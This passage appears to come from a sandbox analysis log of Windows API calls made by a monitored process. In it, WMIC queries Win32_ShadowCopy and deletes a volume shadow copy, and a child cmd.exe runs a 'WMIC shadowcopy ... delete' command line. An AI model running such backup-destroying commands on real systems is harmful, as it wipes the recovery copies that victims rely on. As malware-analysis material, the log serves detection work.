(lpString="FROM") returned 4 [0123.094] lstrlenW (lpString="from") returned 4 [0123.094] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0123.095] malloc (_Size=0x18) returned 0x56cba0 [0123.095] free (_Block=0x56cca0) [0123.095] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0123.095] malloc (_Size=0x18) returned 0x56cca0 [0123.095] free (_Block=0x56cba0) [0123.095] free (_Block=0x56d080) [0123.095] malloc (_Size=0x18) returned 0x56cba0 [0123.095] malloc (_Size=0x18) returned 0x56cc20 [0123.095] malloc (_Size=0x18) returned 0x56cc40 [0123.095] malloc (_Size=0x18) returned 0x56cc60 [0123.095] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0123.095] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0123.095] malloc (_Size=0x18) returned 0x56cc80 [0123.095] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0123.095] SysStringLen (param_1=" WHERE ") returned 0x7 [0123.095] malloc (_Size=0x18) returned 0x56ccc0 [0123.096] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0123.096] SysStringLen (param_1="ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 0x2b [0123.096] free (_Block=0x56cc00) [0123.096] free (_Block=0x56cc80) [0123.096] free (_Block=0x56cc60) [0123.096] free (_Block=0x56cc40) [0123.096] free (_Block=0x56cc20) [0123.096] free (_Block=0x56cba0) [0123.096] ??0CHString@@QEAA@XZ () returned 0x22f9b0 [0123.096] GetCurrentThreadId () returned 0xaa8 [0123.096] malloc (_Size=0x18) returned 0x56cba0 [0123.096] malloc (_Size=0x18) returned 0x56cc20 [0123.096] malloc (_Size=0x18) returned 0x56cc40 [0123.096] malloc (_Size=0x18) returned 0x56cc60 [0123.097] malloc (_Size=0x18) returned 0x56cc80 [0123.097] SysStringLen (param_1="\\\\") returned 0x2 [0123.097] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0123.097] malloc (_Size=0x18) returned 0x56cc00 [0123.097] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0123.097] SysStringLen (param_1="\\") returned 0x1 [0123.097] malloc (_Size=0x18) returned 0x56cce0 [0123.097] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0123.097] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0123.097] free (_Block=0x56cc00) [0123.097] free (_Block=0x56cc80) [0123.097] free (_Block=0x56cc60) [0123.097] free (_Block=0x56cc40) [0123.097] free (_Block=0x56cc20) [0123.098] free (_Block=0x56cba0) [0123.098] malloc (_Size=0x18) returned 0x56cba0 [0123.098] malloc (_Size=0x18) returned 0x56cc20 [0123.098] malloc (_Size=0x18) returned 0x56cc40 [0123.098] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8f29d0 | out: ppNamespace=0xff8f29d0*=0x1f83c18) returned 0x0 [0123.106] free (_Block=0x56cc40) [0123.107] free (_Block=0x56cc20) [0123.107] free (_Block=0x56cba0) [0123.107] CoSetProxyBlanket (pProxy=0x1f83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0123.107] free (_Block=0x56cce0) [0123.107] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0123.107] ??0CHString@@QEAA@XZ () returned 0x22f900 [0123.107] GetCurrentThreadId () returned 0xaa8 [0123.107] malloc (_Size=0x18) returned 0x56cce0 [0123.107] lstrlenA (lpString="") returned 0 [0123.107] malloc (_Size=0x2) returned 0x23dfb0 [0123.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff88314c, cbMultiByte=-1, lpWideCharStr=0x23dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0123.107] free (_Block=0x23dfb0) [0123.107] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 0x50 [0123.107] SysStringLen (param_1="") returned 0x0 [0123.108] free (_Block=0x56cce0) [0123.108] malloc (_Size=0x18) returned 0x56cce0 [0123.108] IWbemServices:ExecQuery (in: This=0x1f83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'", lFlags=0, pCtx=0x0, ppEnum=0x22f908 | out: ppEnum=0x22f908*=0x1f83d18) returned 0x0 [0123.137] free (_Block=0x56cce0) [0123.137] CoSetProxyBlanket (pProxy=0x1f83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0123.140] IEnumWbemClassObject:Next (in: This=0x1f83d18, lTimeout=-1, uCount=0x1, apObjects=0x22f910, puReturned=0x22f920 | out: apObjects=0x22f910*=0x1f83d80, puReturned=0x22f920*=0x1) returned 0x0 [0123.142] malloc (_Size=0x18) returned 0x56cce0 [0123.142] IWbemClassObject:Get (in: This=0x1f83d80, wszName="__PATH", lFlags=0, pVal=0x22f930*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x22f930*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.142] free (_Block=0x56cce0) [0123.142] malloc (_Size=0x800) returned 0x56d080 [0123.142] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x56d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0123.142] FormatMessageW (in: dwFlags=0x2500, lpSource=0x56d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x22f858, nSize=0x0, Arguments=0x22f868 | out: lpBuffer="뚐;") returned 0x67 [0123.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0123.142] malloc (_Size=0x68) returned 0x56d890 [0123.142] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x56d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0123.142] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff8f2ab0 [0123.142] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0123.143] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0123.143] free (_Block=0x56d890) [0123.143] free (_Block=0x56d080) [0123.143] LocalFree (hMem=0x3bb690) returned 0x0 [0123.143] IWbemServices:DeleteInstance (in: This=0x1f83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0124.851] IUnknown:Release (This=0x1f83d80) returned 0x0 [0124.851] malloc (_Size=0x800) returned 0x56d080 [0124.851] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x56d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0124.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0124.851] malloc (_Size=0x20) returned 0x56cef0 [0124.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x56cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0124.851] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff8f2ab0 [0124.851] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0124.851] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0124.851] free (_Block=0x56cef0) [0124.851] free (_Block=0x56d080) [0124.852] IEnumWbemClassObject:Next (in: This=0x1f83d18, lTimeout=-1, uCount=0x1, apObjects=0x22f910, puReturned=0x22f920 | out: apObjects=0x22f910*=0x0, puReturned=0x22f920*=0x0) returned 0x1 [0124.852] IUnknown:Release (This=0x1f83d18) returned 0x0 [0124.853] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0124.853] free (_Block=0x56cca0) [0124.853] free (_Block=0x56ccc0) [0124.853] GetCurrentThreadId () returned 0xaa8 [0124.853] ??0CHString@@QEAA@PEBG@Z () returned 0x22fae8 [0124.853] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x22fae8 [0124.853] lstrlenW (lpString="LIST") returned 4 [0124.853] lstrlenW (lpString="delete") returned 6 [0124.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0124.853] lstrlenW (lpString="ASSOC") returned 5 [0124.853] lstrlenW (lpString="delete") returned 6 [0124.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0124.853] lstrlenW (lpString="GET") returned 3 [0124.853] lstrlenW (lpString="delete") returned 6 [0124.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0124.853] ??1CHString@@QEAA@XZ () returned 0x4edfd601 [0124.853] WbemLocator:IUnknown:Release (This=0x1f83c18) returned 0x0 [0124.854] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0124.854] _kbhit () returned 0x0 [0124.854] free (_Block=0x566f20) [0124.854] free (_Block=0x56cac0) [0124.854] free (_Block=0x56caa0) [0124.854] free (_Block=0x56ca80) [0124.854] free (_Block=0x56ca60) [0124.854] free (_Block=0x5670a0) [0124.854] free (_Block=0x56cb40) [0124.854] free (_Block=0x5685c0) [0124.854] free (_Block=0x56d020) [0124.854] free (_Block=0x56cbc0) [0124.854] free (_Block=0x56cfa0) [0124.854] free (_Block=0x56cae0) [0124.854] free (_Block=0x56cbe0) [0124.855] free (_Block=0x567140) [0124.855] free (_Block=0x566e00) [0124.855] free (_Block=0x56cff0) [0124.855] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0124.855] free (_Block=0x56ce20) [0124.855] free (_Block=0x56cb00) [0124.855] free (_Block=0x56cb20) [0124.855] free (_Block=0x56cf30) [0124.855] free (_Block=0x56cb60) [0124.855] free (_Block=0x567ee0) [0124.855] free (_Block=0x567f30) [0124.855] free (_Block=0x567f80) [0124.855] free (_Block=0x56cb80) [0124.855] free (_Block=0x566a20) [0124.855] free (_Block=0x566de0) [0124.855] free (_Block=0x568040) [0124.855] free (_Block=0x566dc0) [0124.855] free (_Block=0x568000) [0124.855] free (_Block=0x566d60) [0124.855] free (_Block=0x566d80) [0124.855] free (_Block=0x566c40) [0124.855] free (_Block=0x566c60) [0124.855] free (_Block=0x566be0) [0124.855] free (_Block=0x566c00) [0124.855] free (_Block=0x566ca0) [0124.855] free (_Block=0x566cc0) [0124.856] free (_Block=0x566d00) [0124.856] free (_Block=0x566d20) [0124.856] free (_Block=0x566b20) [0124.856] free (_Block=0x566b40) [0124.856] free (_Block=0x566ac0) [0124.856] free (_Block=0x566ae0) [0124.856] free (_Block=0x566b80) [0124.856] free (_Block=0x566ba0) [0124.856] free (_Block=0x566a60) [0124.856] free (_Block=0x566a80) [0124.856] free (_Block=0x5669d0) [0124.856] free (_Block=0x5669a0) [0124.856] free (_Block=0x566e90) [0124.856] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x2 [0124.856] WbemLocator:IUnknown:Release (This=0x1f83b28) returned 0x0 [0124.856] WbemLocator:IUnknown:Release (This=0x1f83a98) returned 0x0 [0124.857] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x1 [0124.857] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0124.857] WbemLocator:IUnknown:Release (This=0x1f71390) returned 0x0 [0124.857] free (_Block=0x56c9e0) [0124.857] free (_Block=0x56ca00) [0124.857] free (_Block=0x568540) [0124.857] free (_Block=0x56ca20) [0124.857] free (_Block=0x56ca40) [0124.857] free (_Block=0x568580) [0124.857] free (_Block=0x56c860) [0124.857] free (_Block=0x56c880) [0124.857] free (_Block=0x5683c0) [0124.857] free (_Block=0x56c8a0) [0124.857] free (_Block=0x56c8c0) [0124.857] free (_Block=0x568400) [0124.857] free (_Block=0x56c7e0) [0124.857] free (_Block=0x56c800) [0124.857] free (_Block=0x568340) [0124.857] free (_Block=0x56c820) [0124.857] free (_Block=0x56c840) [0124.857] free (_Block=0x568380) [0124.857] free (_Block=0x56c960) [0124.857] free (_Block=0x56c980) [0124.858] free (_Block=0x5684c0) [0124.858] free (_Block=0x56c9a0) [0124.858] free (_Block=0x56c9c0) [0124.858] free (_Block=0x568500) [0124.858] free (_Block=0x56c760) [0124.858] free (_Block=0x56c780) [0124.858] free (_Block=0x5682c0) [0124.858] free (_Block=0x56c7a0) [0124.858] free (_Block=0x56c7c0) [0124.858] free (_Block=0x568300) [0124.858] free (_Block=0x56c8e0) [0124.858] free (_Block=0x56c900) [0124.858] free (_Block=0x568440) [0124.858] free (_Block=0x56c920) [0124.858] free (_Block=0x56c940) [0124.858] free (_Block=0x568480) [0124.858] free (_Block=0x56c6a0) [0124.858] free (_Block=0x56c6c0) [0124.858] free (_Block=0x568200) [0124.858] free (_Block=0x56c560) [0124.858] free (_Block=0x56c580) [0124.858] free (_Block=0x5680c0) [0124.858] free (_Block=0x566e50) [0124.858] free (_Block=0x566e70) [0124.858] free (_Block=0x568080) [0124.858] free (_Block=0x56c5e0) [0124.859] free (_Block=0x56c600) [0124.859] free (_Block=0x568140) [0124.859] free (_Block=0x56c6e0) [0124.859] free (_Block=0x56c700) [0124.859] free (_Block=0x568240) [0124.859] free (_Block=0x56c5a0) [0124.859] free (_Block=0x56c5c0) [0124.859] free (_Block=0x568100) [0124.859] free (_Block=0x56c620) [0124.859] free (_Block=0x56c640) [0124.859] free (_Block=0x568180) [0124.859] free (_Block=0x56c660) [0124.859] free (_Block=0x56c680) [0124.859] free (_Block=0x5681c0) [0124.859] free (_Block=0x56c720) [0124.859] free (_Block=0x56c740) [0124.859] free (_Block=0x568280) [0124.859] CoUninitialize () [0124.875] exit (_Code=0) [0124.875] free (_Block=0x56cd30) [0124.875] free (_Block=0x567ea0) [0124.875] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0124.875] free (_Block=0x566f40) [0124.875] free (_Block=0x566a40) [0124.875] free (_Block=0x567e60) [0124.876] free (_Block=0x567e20) [0124.876] free (_Block=0x567dd0) [0124.876] free (_Block=0x567d90) [0124.876] free (_Block=0x567d30) [0124.876] free (_Block=0x565a90) [0124.876] free (_Block=0x565a50) [0124.876] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0124.876] free (_Block=0x56cec0) Thread: id = 253 os_tid = 0x8dc Thread: id = 254 os_tid = 0x8fc Thread: id = 255 os_tid = 0x330 Thread: id = 256 os_tid = 0x30c Thread: id = 257 os_tid = 0x500 Process: id = "50" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2263a000" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 258 os_tid = 0x748 [0124.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f850 | out: lpSystemTimeAsFileTime=0x12f850*(dwLowDateTime=0x51e7f270, dwHighDateTime=0x1d68245)) [0124.948] GetCurrentProcessId () returned 0x87c [0124.948] GetCurrentThreadId () returned 0x748 [0124.948] GetTickCount () returned 0x1154bc0 [0124.948] QueryPerformanceCounter (in: lpPerformanceCount=0x12f858 | out: lpPerformanceCount=0x12f858*=24484087340) returned 1 [0124.950] GetModuleHandleW (lpModuleName=0x0) returned 0x4a760000 [0124.950] __set_app_type (_Type=0x1) [0124.950] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a787810) returned 0x0 [0124.950] __getmainargs (in: _Argc=0x4a7aa608, _Argv=0x4a7aa618, _Env=0x4a7aa610, _DoWildCard=0, _StartInfo=0x4a78e0f4 | out: _Argc=0x4a7aa608, _Argv=0x4a7aa618, _Env=0x4a7aa610) returned 0 [0124.950] GetCurrentThreadId () returned 0x748 [0124.950] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x748) returned 0x3c [0124.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0124.950] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0124.950] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.951] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.951] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f7e8 | out: phkResult=0x12f7e8*=0x0) returned 0x2 [0124.951] VirtualQuery (in: lpAddress=0x12f7d0, lpBuffer=0x12f750, dwLength=0x30 | out: lpBuffer=0x12f750*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.951] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f750, dwLength=0x30 | out: lpBuffer=0x12f750*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.951] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f750, dwLength=0x30 | out: lpBuffer=0x12f750*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.951] VirtualQuery (in: lpAddress=0x34000, lpBuffer=0x12f750, dwLength=0x30 | out: lpBuffer=0x12f750*(BaseAddress=0x34000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.951] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f750, dwLength=0x30 | out: lpBuffer=0x12f750*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0124.951] GetConsoleOutputCP () returned 0x1b5 [0124.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a79bfe0 | out: lpCPInfo=0x4a79bfe0) returned 1 [0124.951] SetConsoleCtrlHandler (HandlerRoutine=0x4a783184, Add=1) returned 1 [0124.951] _get_osfhandle (_FileHandle=1) returned 0x7 [0124.951] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0124.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0124.952] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a78e194 | out: lpMode=0x4a78e194) returned 1 [0124.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0124.952] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0124.952] _get_osfhandle (_FileHandle=0) returned 0x3 [0124.952] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a78e198 | out: lpMode=0x4a78e198) returned 1 [0124.952] _get_osfhandle (_FileHandle=0) returned 0x3 [0124.952] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0124.952] GetEnvironmentStringsW () returned 0x2e8b90* [0124.952] GetProcessHeap () returned 0x2d0000 [0124.952] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2e9620 [0124.953] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0124.953] GetProcessHeap () returned 0x2d0000 [0124.953] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x8) returned 0x2e8a10 [0124.953] GetEnvironmentStringsW () returned 0x2e8b90* [0124.953] GetProcessHeap () returned 0x2d0000 [0124.953] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa7c) returned 0x2ea0b0 [0124.953] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0124.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x44) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x18, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x1, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x1, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x0, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x40, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x40, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x40, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.953] RegCloseKey (hKey=0x44) returned 0x0 [0124.953] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x44) returned 0x0 [0124.953] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x40, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x1, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x1, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x0, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x9, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x4, lpData=0x12e6c0*=0x9, lpcbData=0x12e6a4*=0x4) returned 0x0 [0124.954] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e6a0, lpData=0x12e6c0, lpcbData=0x12e6a4*=0x1000 | out: lpType=0x12e6a0*=0x0, lpData=0x12e6c0*=0x9, lpcbData=0x12e6a4*=0x1000) returned 0x2 [0124.954] RegCloseKey (hKey=0x44) returned 0x0 [0124.954] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517461 [0124.954] srand (_Seed=0x5f517461) [0124.954] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" [0124.954] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" [0124.954] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a79c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0124.954] GetProcessHeap () returned 0x2d0000 [0124.954] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eab40 [0124.954] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0124.954] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a78f360, nSize=0x2000 | out: 